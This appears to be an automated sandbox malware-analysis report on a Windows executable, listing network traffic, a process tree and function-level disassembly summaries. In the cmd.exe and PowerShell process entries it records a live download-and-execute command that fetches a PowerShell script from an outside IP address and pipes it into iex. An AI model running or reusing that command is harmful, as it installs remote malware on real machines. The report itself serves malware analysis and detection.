2024-11-07 16:55:28 UTC	1012	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 16:55:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6gh3me61pd0cfc0mqc4envhb6s; expires=Mon, 03-Mar-2025 10:42:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V3iLugQWYRzEFdpnzrcBBZr%2BxJYFTZcyto7bl2hG90ckyqpWN5KPoFqFopy2Vm%2B4L04O4WbhsGnwFElBCPG60IGAV7gruRj5jZa%2FW7q0GL87vd2%2FOK%2F8hhwpcwwmcvxgOZRD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8deed9e229fd8c36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=102492&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1017&delivery_rate=37338&cwnd=252&unsent_bytes=0&cid=b28f18c00a07b23a&ts=545&x=0"
2024-11-07 16:55:28 UTC	54	IN	Data Raw: 33 30 0d 0a 67 44 51 63 6e 67 44 63 36 68 32 32 61 64 76 58 42 57 37 5a 7a 43 62 36 68 6b 65 49 33 4e 2b 6d 75 39 67 55 4c 4a 4a 6d 71 50 7a 62 61 51 3d 3d 0d 0a Data Ascii: 30gDQcngDc6h22advXBW7ZzCb6hkeI3N+mu9gULJJmqPzbaQ==
2024-11-07 16:55:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	11:55:08
Start date:	07/11/2024
Path:	C:\Users\user\Desktop\7IXl1M9JGV.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\7IXl1M9JGV.exe"
Imagebase:	0x7ff7d77f0000
File size:	122'368 bytes
MD5 hash:	826AC9D03E37048DF300B013335098D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:55:08
Start date:	07/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6cb9a0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:55:08
Start date:	07/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} \| iex"
Imagebase:	0x7ff6b2e60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:55:08
Start date:	07/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} \| iex"
Imagebase:	0x7ff715890000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:55:12
Start date:	07/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline"
Imagebase:	0x7ff6aaf80000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:55:12
Start date:	07/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES267D.tmp" "c:\Users\user\AppData\Local\Temp\qh4rltex\CSCE36AEDAA1DED41D2AE2F4E1F8F6B418.TMP"
Imagebase:	0x7ff67ed70000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:55:12
Start date:	07/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
Imagebase:	0x550000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:55:15
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default"
Imagebase:	0x7ff66aca0000
File size:	2'742'376 bytes
MD5 hash:	BB7C48CDDDE076E7EB44022520F40F77
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	11:55:17
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2240,i,9410338338245658404,8663607227603881870,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2252 /prefetch:3
Imagebase:	0x7ff66aca0000
File size:	2'742'376 bytes
MD5 hash:	BB7C48CDDDE076E7EB44022520F40F77
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:55:21
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --no-subproc-heap-profiling --field-trial-handle=3808,i,9410338338245658404,8663607227603881870,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=5316 /prefetch:3
Imagebase:	0x7ff66aca0000
File size:	2'742'376 bytes
MD5 hash:	BB7C48CDDDE076E7EB44022520F40F77
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	11:55:41
Start date:	07/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6df240000
File size:	57'360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	12.1%
Total number of Nodes:	1762
Total number of Limit Nodes:	24

Executed Functions

Function 00007FF7D77F5480 Relevance: 2.6, Strings: 2, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

COMSPEC, xrefs: 00007FF7D77F54A3
cmd.exe, xrefs: 00007FF7D77F556D

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID: COMSPEC$cmd.exe
API String ID: 485612231-2256226045
Opcode ID: e3c8c1c89efee8ce5da41e7d845e16cba20a98ffcbbe375bf0f7f7e3e9597ed0
Instruction ID: bbc1e0408fea72822bc4662ab93ee3ae4d7cbf1e4b9a19d989f48b381989f5d2
Opcode Fuzzy Hash: e3c8c1c89efee8ce5da41e7d845e16cba20a98ffcbbe375bf0f7f7e3e9597ed0
Instruction Fuzzy Hash: 54315132B08B0189F714BB65DA425ACF2A1AF8D764BC54D37EE1D57685CE38D4068670

Function 00007FF7D77F73F8 Relevance: 1.4, Strings: 1, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.com, xrefs: 00007FF7D77F75C3

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID: .com
API String ID: 485612231-4200470757
Opcode ID: a3411b78a9230fd7b513c6962f24126251d892dc989e786e47a4f55becc28119
Instruction ID: c6d278c53bf00b186c760c349b1393563da10c85ca805c5d97bf461703854420
Opcode Fuzzy Hash: a3411b78a9230fd7b513c6962f24126251d892dc989e786e47a4f55becc28119
Instruction Fuzzy Hash: CA518311F0964345FA59BA269A116BDE681AF49BF4FC84D36DE1D477C2EE3CE40382A0

Function 00007FF7D77F7648 Relevance: 15.2, APIs: 10, Instructions: 163
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF7D77F77AE
GetExitCodeProcess.KERNELBASE ref: 00007FF7D77F77BC
CloseHandle.KERNEL32 ref: 00007FF7D77F77D2
CloseHandle.KERNEL32 ref: 00007FF7D77F77E0
GetLastError.KERNEL32 ref: 00007FF7D77F77EE
CloseHandle.KERNEL32 ref: 00007FF7D77F7803
CloseHandle.KERNEL32 ref: 00007FF7D77F7815
CloseHandle.KERNEL32 ref: 00007FF7D77F782E
CloseHandle.KERNEL32 ref: 00007FF7D77F783C
CloseHandle.KERNEL32 ref: 00007FF7D77F7852

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait
String ID:
API String ID: 17306042-0
Opcode ID: b31d8921cc63fcc389b3533738d7b07000d37d85641a9ec7b60fb67a70f7207e
Instruction ID: 6cd55e251d12d541d6b89f0fbf624d1130b9cb54558d59a360e5c43616828813
Opcode Fuzzy Hash: b31d8921cc63fcc389b3533738d7b07000d37d85641a9ec7b60fb67a70f7207e
Instruction Fuzzy Hash: BF614222B19A0285FB20BF61D9401BCE7A1AB49BB4BD50D36DD4D57B84CE3CE457C3A0

Function 00007FF7D77FB66C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32 ref: 00007FF7D77FB7E8
GetProcAddress.KERNEL32 ref: 00007FF7D77FB7F4

Strings

ext-ms-, xrefs: 00007FF7D77FB745
api-ms-, xrefs: 00007FF7D77FB732

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 2f2c060fe260cb324cbfd5daf3e2b6810ab47f0f51b7d2efba706c84bfec6660
Instruction ID: a4ddf21514cb25315dc39b6f641f30088c4072fbcd342943f51f19e981447ee8
Opcode Fuzzy Hash: 2f2c060fe260cb324cbfd5daf3e2b6810ab47f0f51b7d2efba706c84bfec6660
Instruction Fuzzy Hash: EE41B621B1960241EA15EB2A99006BDE791BF49BB0FD54937DE0D57B94DE3CE4478330

Function 00007FF7D77F9CDC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7D77F9638: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF7D77F9974), ref: 00007FF7D77F9662

IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,COMSPEC,00007FF7D77F9AA5), ref: 00007FF7D77F9D49
GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,COMSPEC,00007FF7D77F9AA5), ref: 00007FF7D77F9D8D

Strings

COMSPEC, xrefs: 00007FF7D77F9CE6

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: CodeInfoPageValid
String ID: COMSPEC
API String ID: 546120528-1631433037
Opcode ID: 3af343390b77110a02a506cd19370eeab66c9a9a0b233950a6eb876c2411c606
Instruction ID: 6540c6aaf631036410f68b81346826907ab12c6b16b61b5611957d49dec226b9
Opcode Fuzzy Hash: 3af343390b77110a02a506cd19370eeab66c9a9a0b233950a6eb876c2411c606
Instruction Fuzzy Hash: 2681F362A0C68282EB64AF25D14427DFBE1EB49750FD44437DE8E87690DE3DE553CB20

Function 00007FF7D77FBA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE ref: 00007FF7D77FBADD
LCMapStringW.KERNEL32 ref: 00007FF7D77FBB11

Strings

LCMapStringEx, xrefs: 00007FF7D77FBA5C, 00007FF7D77FBA6D

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: db6ebe94a415d6a03d904cc959e4b9e1f838ccd974c526e1b6ecebf4d59b73bd
Instruction ID: 6e9e48a6e2d8b298fb77f6277186733b9dd49939a91028c6ba7a1f68e2fd93bf
Opcode Fuzzy Hash: db6ebe94a415d6a03d904cc959e4b9e1f838ccd974c526e1b6ecebf4d59b73bd
Instruction Fuzzy Hash: 29214C35608B8186D760DB16B48069AF7A5FB88BD0F944136EE8D53B29DF3CD4518B10

Function 00007FF7D77F61A8 Relevance: 4.5, APIs: 3, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7D77F61A4), ref: 00007FF7D77F61B9
TerminateProcess.KERNEL32(?,?,?,00007FF7D77F61A4), ref: 00007FF7D77F61C4
ExitProcess.KERNEL32 ref: 00007FF7D77F61D3

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 418c26ef4a93b74874d8136e03d787bb323774ff48da52fbb78717f422105309
Instruction ID: 39e7921c0c9996e791eb2ba73f5192fdd2f7b73ed8688312d04fcab0469c58bf
Opcode Fuzzy Hash: 418c26ef4a93b74874d8136e03d787bb323774ff48da52fbb78717f422105309
Instruction Fuzzy Hash: FCD01710B09A0242EA243B70594517C82A13F4C712BC01C3ECC0B62383CD2CA41F4220

Function 00007FF7D77F9750 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32 ref: 00007FF7D77F9792

Strings

, xrefs: 00007FF7D77F97D5

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 9702de0ee23d9cfe9660e37e600eb8c80be4f13ea7386c82deb4e47b0cc5b9a7
Instruction ID: 00f2b40897c3e98d525910e6b2ef25060cf824ff2e5b20aa2f004ebe4b28a030
Opcode Fuzzy Hash: 9702de0ee23d9cfe9660e37e600eb8c80be4f13ea7386c82deb4e47b0cc5b9a7
Instruction Fuzzy Hash: 6B518E72A1C6C19AE7219F24D1843ADFBA0F748754FD4453ADA8D83A85CB3CD556CB20

Function 00007FF7D77FAC38 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 00007FF7D77FACB1
GetFileType.KERNELBASE ref: 00007FF7D77FACC7

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 8457bcf0b0f19edba7e93e74d16084af20cc6611793b13a120dc7196f517a12f
Instruction ID: 61ebb3e32720389e16669803aa632a1bb3a25fffef87b03283296bfa0705ea8f
Opcode Fuzzy Hash: 8457bcf0b0f19edba7e93e74d16084af20cc6611793b13a120dc7196f517a12f
Instruction Fuzzy Hash: A9317421E18B4542E7609F14869017CEA50FB8ABB0BE5072BDF6E173E4CF39E4A2D350

Function 00007FF7D77FCE58 Relevance: 1.7, APIs: 1, Instructions: 181
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 00007FF7D77FD0B3

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4215a585b414b005bd97d4a36c1c909f05baa03a975093ad59d75518a7a8c7a1
Instruction ID: f5e0be06a21a14a17b2e1f9e4fb68828806c623f49a5c1d8b8f1ae7eca665fc5
Opcode Fuzzy Hash: 4215a585b414b005bd97d4a36c1c909f05baa03a975093ad59d75518a7a8c7a1
Instruction Fuzzy Hash: 57819637A087818AE7109B65E5401AEFBE4F7487A8F940537DF8817BA8DF38D456C710

Function 00007FF7D77F60D9 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7D77F6107

Part of subcall function 00007FF7D77F6200: GetModuleHandleExW.KERNEL32 ref: 00007FF7D77F6225
Part of subcall function 00007FF7D77F6200: GetProcAddress.KERNEL32 ref: 00007FF7D77F623B
Part of subcall function 00007FF7D77F6200: FreeLibrary.KERNEL32 ref: 00007FF7D77F6262

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: b616f563cc8fa832ee263592121d95a50f483c6cab661a2b025e3d2b058bb068
Instruction ID: 9ceb16be43e44e1d56ada5de70756d1f6d18efa797f462b427c614ec0406903a
Opcode Fuzzy Hash: b616f563cc8fa832ee263592121d95a50f483c6cab661a2b025e3d2b058bb068
Instruction Fuzzy Hash: 76219F32E08A018DEB24AF64C4402ACB3A0FB48328F840E36DA1C47BC6EF38D546C760

Function 00007FF7D77F88F0 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF7D77F876A,?,?,00000000,00007FF7D77F71C5,?,?,?,?,00007FF7D77F7251), ref: 00007FF7D77F8945

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: ff9a0649186f7903886a12b3afb26e01b779ef78c2db2541cf97622d570a0ff3
Instruction ID: 2a2eaae4e0a94dc84e40b9912eed29683c8eb2f08ce043cdfdfefd8108d4f217
Opcode Fuzzy Hash: ff9a0649186f7903886a12b3afb26e01b779ef78c2db2541cf97622d570a0ff3
Instruction Fuzzy Hash: A3F03704B4921341FE55B7A59A512FDD2842F8CBA0FC84D36CD1E8A2C2DE1CF5524232

Non-executed Functions

Function 00007FF7D77F6DB4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7D77F6E2D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7D77F6E45
RtlVirtualUnwind.KERNEL32 ref: 00007FF7D77F6E80
IsDebuggerPresent.KERNEL32 ref: 00007FF7D77F6EB9
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7D77F6EC3
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7D77F6ECE

Strings

COMSPEC, xrefs: 00007FF7D77F6DC0

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID: COMSPEC
API String ID: 1239891234-1631433037
Opcode ID: 51178ebc8e53b6e4353f01a20e97e9a09147ba2b4be2c88f445a7f32260a6ae7
Instruction ID: 29894e9c438e5adf1d33578c1470a9dcebce4a3d7a84c341839632f4afd0bd97
Opcode Fuzzy Hash: 51178ebc8e53b6e4353f01a20e97e9a09147ba2b4be2c88f445a7f32260a6ae7
